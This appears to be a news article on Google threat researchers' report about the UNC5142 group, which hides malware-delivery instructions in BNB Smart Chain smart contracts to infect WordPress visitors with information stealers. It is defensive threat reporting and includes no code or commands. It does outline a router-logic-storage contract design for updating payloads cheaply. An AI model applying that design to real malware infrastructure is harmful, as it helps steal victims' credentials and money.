In a development that blurs the line between Web3 innovation and cyber exploitation, Google’s Threat Intelligence Group (GTIG) has revealed that a financially motivated hacking group, UNC5142, is abusing blockchain smart contracts to distribute malware.
The group leverages a technique known as EtherHiding, embedding malicious code directly on public blockchains such as the BNB Smart Chain, effectively using decentralized systems as a hosting network for malware.
Since mid-2024, the group has infected over 14,000 WordPress pages, injecting JavaScript that redirects visitors to compromised landing pages. These pages mimic browser update prompts but actually download information stealers — malware designed to extract credentials, financial data, and browser-stored information.
FCRF Launches CCLP Program to Train India’s Next Generation of Cyber Law Practitioners
The Malware Chain: From WordPress to Wallets
At the heart of the campaign is a JavaScript downloader dubbed CLEARSHORT, a variant of the ClearFake malware framework. The infection chain begins when victims visit compromised WordPress sites containing malicious code injected into plugins, themes, or databases.
That first-stage code communicates with malicious smart contracts on the BNB Smart Chain, which fetch instructions for downloading secondary payloads — often hosted on Cloudflare .dev, GitHub, or MediaFire.
Once executed, the malware — including Atomic (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar — runs directly in memory to avoid antivirus detection. Both Windows and macOS users are targeted through fake system update prompts, tricking them into running terminal or PowerShell commands.
Blockchain as a Shield for Attackers
By embedding commands into smart contracts, UNC5142 exploits the immutable-yet-upgradable design of blockchain systems. Using what developers call the proxy pattern, the hackers maintain a three-contract architecture — separating router, logic, and storage — allowing them to update payload URLs or encryption keys without changing any website code.
Each update costs the hackers as little as $0.25 to $1.50 in blockchain network fees, granting them near-unlimited flexibility. The result is an agile and resilient infrastructure — difficult for law enforcement or cybersecurity vendors to dismantle.
A Sign of What’s Coming
The use of blockchain for malware delivery marks a pivotal shift in cybercrime strategy. Decentralized technology — long touted for transparency and security — is now being repurposed as a weapon for obfuscation.
Google’s researchers have not observed new UNC5142 campaigns since July 2025, suggesting a temporary lull or operational shift. But experts warn the model could inspire copycat attacks, fusing the anonymity of crypto ecosystems with the scalability of automated malware delivery.
“Once hackers start leveraging immutable public ledgers for infection control,” one researcher noted, “traditional takedown models simply don’t work anymore.”
